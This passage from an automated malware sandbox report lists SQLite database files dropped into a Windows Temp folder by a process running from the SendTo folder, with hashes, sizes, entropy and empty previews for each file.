                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\DnGPYelHvx

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\E5TU0VDgKW

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\EZwxeUxydc

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\EhfPQFRvyl

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\F9OQ1npE2e

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\FDjPTk1pNt

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\FTVa4y9vCu

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\FjYPCsB9aj

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\FtmqtHVhsU

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\G42852JhrY

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\GBXJS8OsJa

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\GNFVYbkuGf

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\GPCF3klFEG

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\GTSYjYRVd2

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Gp3p0nB0DL

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\H8OqEXXstH

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\HDJjnJskdR

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\HPkYajP7Hz

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\HdXFfCkRik

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\HdaAl8ha4c

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Hgt4X1TNAu

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Hka6Ra0jc3

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\I0IbX2jS1M

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\IdWUHv7f5q

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
